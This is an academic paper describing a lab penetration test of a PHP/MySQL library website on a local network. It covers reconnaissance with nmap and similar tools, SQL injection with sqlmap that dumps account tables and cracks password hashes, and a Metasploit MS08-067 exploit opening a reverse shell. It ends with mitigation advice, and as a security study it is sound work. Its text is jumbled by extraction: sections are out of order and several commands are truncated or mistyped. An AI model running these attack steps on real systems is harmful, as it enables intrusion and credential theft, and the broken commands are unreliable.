Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia dragan.menoski@gmail.com, {pece.mitrevski, tome.dimovski}@uklo.edu.mk Abstract - Penetration testing on a website is discussed in this paper, in order to discover security vulnerabilities that may exist. The test is performed against a library CMS website, hosted in the same LAN with the attacker machine. The website is implemented using PHP and MySQL database, whereas sophisticated tools from the BackTrack 5 R3 Operating System are used for testing purposes. In addition to discovered vulnerabilities, some suggestions on improving website security are considered, as well. I. INTRODUCTION Penetration testing (PenTest) [1] is the process of conducting security assessment, or audit, which defines a set of rules, practices, methods and procedures [2] that must be followed during the process execution. PenTest includes proven practices, which should be handled with great care in order to correctly assess system security. There are three types of penetration testing: Black-box testing the auditor that uses this approach will be assessing the network infrastructure from a remote location and does not have any prior knowledge about the technologies that are used in the system that will be tested. This approach is known as external testing and the auditor is known as black-hat. White-box testing - typical for this approach is that the auditor is aware about the internal technologies that are used in the environment that will be tested. Considering fact that the auditor already has some information about the technologies used in the system, this type of testing can produce better results compared with the black-box type. This type is known as internal testing and the auditor is called whitehat. Gray-box - The combination of the previous types of testing is called Gray-box. This combination takes advantage of both types and the auditor that uses this type is known as grayhat. The penetration testing process in divided in several phases: target scoping, information gathering, target discovery, enumeration target, vulnerability mapping, social engineering, target exploitation, privilege escalation, maintaining access, documentation and reporting [3]. These phases are used entirely in a blackbox type, while in white-box the phases such as target scoping, information gathering and target discovery may be omitted, because of the fact that the white-hat auditor has prior knowledge about the system that shall be tested. II. WEB SITE TESTING A. Defining the type of testing As mentioned previously, the website is on a localhost and is in the same LAN with the machine that will perform the testing. The site has been developed using the PHP programming language and a MySQL database. Having this information in mind, the testing would be categorized as a white-box testing. B. Target discovery Although it is known that the target machine and the auditor s machine are in the same LAN, the IP address of the target machine still remains unknown. In order to find the IP address, one can make a scan for the host in a LAN using the genlist tool [4]. To run the scan, after opening the terminal (Ctrl+Alt +T), the following command has to be typed: # genlist -s 192.168.1.\* genlist is a command to run the tool, -s is a parameter that tells the tool to perform host scanning and 192.168.1.\* is a value for the previous parameter and this value specifies the scope where the scanning shall be done. The result from the scanning is shown below: 192.168.1.1 192.168.1.2 192.168.1.121 There are 3 IP addresses listed. With the ifconfig command an auditor can check its own IP address, and in this case it is 192.168.1.121. The 192.168.1.1 is obviously the IP address of the router. Consequently, 192.168.1.2 must be the IP address of the machine where the website is hosted. The next step is to find which operating system is used by the host machine. For that purpose xprobe2 tool can be used. To run this tool, the auditor should navigate from BackTrack 5 R3 menu to the following path: Applications > BackTrack > Information Gathering > Network Analysis > OS Fingerprinting > xprobe2. xprobe2 needs
to be started with root privileges, because it uses a raw socket to send the probes. To get the operating system info, the following command should be executed: # sudo xprobe2 192.168.1.2 sudo is an abbreviation from Super user do and means that the tool will be started with root privileges. It is followed by the name of the tool, and the IP address of the target machine. The main part from the result of this command is listed below: [+] Primary network guesses: [+] Host 192.168.1.2 Running OS: Microsoft Windows XP SP2 (Guess probability: 100%) From this part, one can conclude that the target machine uses Windows XP Service Pack 2 OS. C. Enumerating Target In this phase, the auditor collects information about the ports and the services that are available on the target environment. This information is used later to identify the vulnerabilities that may exist on the target machine. The nmap tool, that is a port scanner, can be used to scan ports and discover services that listen on these ports. In order to disclose TCP ports, the following command shall be used: # nmap -st 192.168.1.2 The result from the previous command is shown below: Not shown: 995 closed ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open micosoft-ds 3306/tcp open mysql MAC Address: 00:0F:EA:56:EB:BB From the result, it can be concluded that the host has 5 open tcp ports, and that port 80 has a http server, whereas on port 3306 is the MySQL server. To make a scan for udp ports, the following command shall be executed: # nmap -su 192.168.1.2 With amap the application that is running on a specific port can be checked. This tool sends a trigger packet to the port and compares the response to its database. To run amap, one should navigate from BackTrack 5 R3 menu to the following path: Applications > BackTrack > Information Gathering > Network Analysis > Service Fingerprinting > amap. From the result of nmap it is known that there is some http server on port 80 and MySQL server on port 3306. So, with amap, additional information can be obtained about these 2 services. To get that information, the following command shall be executed: # amap -bq 192.168.1.2 80 3306 amap is the name of the tool that shall be used, -bq is a parameter meaning show banner information and do not show closed and unidentified ports. The next is the IP address of the machine where the scan shall be done and, at the very end, ports that shall be scanned for services are enumerated. The main part of the result from execution of this command is shown below: Protocol on 192.168.1.2:80/tcp matches http - banner HTTP/1.1 200 OK Server Apache/2.4.4 (Win32) PHP/5.4.16 x-powered by PHP/5.4.16 Content-Length 4192 Connection close Protocol on 192.168.1.2:3306/tcp matches mysqlsecured - banner: FjHost '192.168.1.121' is not allowed to connect to this mysql serevr. From the result, it can be seen that port 80 is listened to by Apache Server version 2.4.4 and the host has installed PHP version 5.4.16. About the mysql server, there is no extra info like version number, because the machine has no privileges to establish a connection. Httprint is an application that can be used to detect an HTTP server software and version. This tool will only identify HTTP servers that it knows about. To work with httprint the auditor must be sure that there is no HTTP proxy between his machine and the target machine. To run this tool, one must navigate, via terminal, to the following location: /penttest/enumeration/web/httprint/ linux. To get information about the HTTP server, the folowing command must be executed: #./httprint -h 192.168.1.2 -s signatures.txt./httprint will run the tool, the -h parameter defines the host where the tool will be looking for http servers and, in this case, the host is 192.168.1.2. The -s parameter defines the name and the extension of the file that represents the store for servers signatures. The result from execution of this command is shown below: Host: 192.168.1.2 Derivered Signature: Apache/2.4.4 (Win32) PHP/5.4.16 Banner Reported: Apache/2.4.4 (Win32) PHP/5.4.16 Banner Deduced: Apache/2.0.x This result confirms the information about the server that was received from amap. An experienced Penetration Tester should always confirm the results by two or more tools, because it increases the level of accuracy of the result [5],[6],[7],[8]. It is not a good practice to 100% rely only on the results of a single tool. D. Vulnerability Mapping The auditor, in this phase, performs identification and makes analysis on the critical security flaws in the target system. SQLMap is an automatic SQL injection tool that is used for scanning, detecting and exploiting the SQL injection flaws for a given URL. This tool has support for several database management systems such as MS-SQL,
MySQL, Oracle and PostgreSQL. To run this tool, one should navigate to the following location via terminal: /pentest/database/sqlmap. To see all the commands that are offered by SQLMap, the following command in the previously mentioned location should be executed: # python sqlmap.py h In order to see all the databases that exist on the MySQL database server, the following command has to be executed: index.php?category=1 --dbs python means that a script that is written in the Python programming language should be executed: sqlmap.py is the name of the python script that will be executed. The execution of this script will run the sqlmap tool. The -u parameter is used to specify the url where the sqlmap will make SQL injection attack. http://192.168.1.2/library/ index.php?category=1 is the value for the previously mentioned parameter. The --dbs is used to show all the databases that will be found. It is important to note that the names of databases will be listed only if the specified URL is prone to SQL injection. The results that are obtained with executing the abovementioned command are listed below: available databases [5]: [ * ] library [ * ] information_shema [ * ] mysql [ * ] performance_shema [ * ] test From the result we can see that the website is prone to SQL injection and there are 5 databases in the MySQL Server. From the names of databases it is easy to understand that the library is the database that is used for storing the data for our website. When using SQLMap, one must not forget that notice that is given by the same tool: [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. The next step is to discover all the tables in the library database. To do so, one needs to execute the following command: index.php?category=1 --tables -D library --tables parameter tells to SQLMap to show all the tables and the -D specifies the name of the database where SQLMap will be looking for tables. In this case the value of -D parameter is library. The result obtained from executing the previous command is shown below by the names of the tables one can assume that in the tables admin and librarians data about the website's accounts is stored. According to the assumption the next step will be showing all the columns from these two tables. [6 tables] admin librarians members category book subcategory The commands that will show the tables are listed below: index.php?category=1 -D library -T admin index.php?category=1 -D library -T librarians The result from the execution of the first command is: Table: admin [5 columns] Column hashed_password Id first_name last_name Username Type int(11) The result from the execution of the second command is: Table: librarians [6 columns] Column Email hashed_password id first_name last_name username Type int(11) According to the names of the columns (e.g. username, hashed_password and email) our assumption that sensitive data is stored in these two tables seems to be true. The next step will be to extract data from these tables. To do so, one needs to execute the following commands: index.php?category=1 --dump -D library -T admin index.php?category=1 --dump -D library -T librarians --dump is parameter that tells SQLMap to extract the data from the table that is specified as a value for the -T parameter. The results from the previous two commands are shown in Figs. 1 and 2, respectively. From the result shown in Fig. 1, one can see that the website has two administrators (e.g. dmenoski and gjmenoski). The passwords for the administrators are not stored as plain text rather, they are encrypted.
E. Target Exploitation Figure 1. Data from admin table In this phase, the auditor tries to exploit the vulnerabilities that are found during the previous phases in order to get control over the target system. With the xprobe2 we discover that the host machine use Microsoft Windows XP Service Pack 2 OS. With this information, we can search for already known vulnerabilities for this operating system. We found that, with MFSConsole, which is included in the Metasploit Framework, full access on the machine can easily be obtained. In order to exploit the target machine, one needs to open a terminal and type the following commands: Figure 2. Data from librarians table mfsconsole run the tool. From the result shown on Fig. 2, one can see that the website has three librarians (e.g. librarian, cristiano and kaka). The passwords for the librarians are also encrypted, but in the process of getting the data, SQLMap recognized that they are stored password hashes and asks the following question: analyzing table dump for possible password hashes recognized possible password hashes in column 'hashed_password'. Do you want to crack them via a dictionary based attack? [Y/n/q] Answering to this question with Y (yes), SQLMap will ask another question: what dictionary do you want to use? [1] default dictionary file 'pentest/database/sqlmap/txt/ wordlist.txt' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > To this question we answer with choosing the first option. And the last question that is asked from SQLMap is: do you want to use common password suffixes? (slow) [y/n] The answer to this question is N (No). So, SQLMap tries to get the plain text of the encrypted password and it is successful for the first and the third librarian. The password as plain text is shown under the hashed_password column, surrounded in parentheses. The passwords for the first and the third librarian accounts were successfully cracked because the first was the same as the username and the second contained only three digits. This is a mistake belonging to the users when creating their accounts. Namely, the password should never be the same as the username, and it should contain more than 6 characters including alphabet letters, digits and special characters. The SQLMap does not recognize that there are hashes for password in admin table. But we can try to decrypt these hashes using some of the tools for password cracking. use exploit/windows/smb/ms08_067_netapi show options - show available options set RHOST 192.168.1.2 - set IP address of the target machine as RHOST set PAYLOAD windows/shell/reverse_tcp - set value for payload show options - show available options for payload set LHOST 192.168.1.121 - set IP address of the auditor's machine exploit - start process of exploitation In a short period of time, the console of the target machine will be shown. We can execute any command on the target machine. To confirm that everything is OK, we can simply create new folder in the C: drive with the commands: # cd.. # cd.. # mkdir test III. CONCLUSION From the penetration testing that was performed on a local library website, one can see that several vulnerabilities were successfully exploited. Firstly, as one of the main drawbacks was that the host machine did not have a firewall. The system administrator should install the firewall with a proper configuration. In addition, the operating system of the target machine was easily vulnerable. As a solution for this issue, one can install patches for all known vulnerabilities or install a newer and more secure OS. The web site is prone to SQL injection attack. As a protection for this type of attack, the programmers that build the site should implement proper validation and string escaping for all inputs. REFERENCES [1] T. Wilhelm, Professional Penetration Testing, Second Edition, Elsevier, 2013
[2] EC-Council, Penetration Testing Procedures and Methodologies, EC-Council Press, 2011 [3] J. Andress and R. Linn, Coding for Penetration Testers, Elsevier, 2012 [4] J. Faircloth, Penetration Tester's Open Source Toolkit, Third Edition, Elsevier, 2011 [5] L. Allen, Advanced Penetration Testing for Highly-Secured Environments The Ultimate Security Guide, Packt, 2012 [6] W. L. Pritchett and D. De Smet, Kali Linux Cookbook, Packt, 2013 [7] A. Singh, Metasploit Penetration Testing Cookbook, Packt, 2012 [8] J. Muniz and A. Lakhani, Web Penetration Testing with Kali Linux, Packt, 2013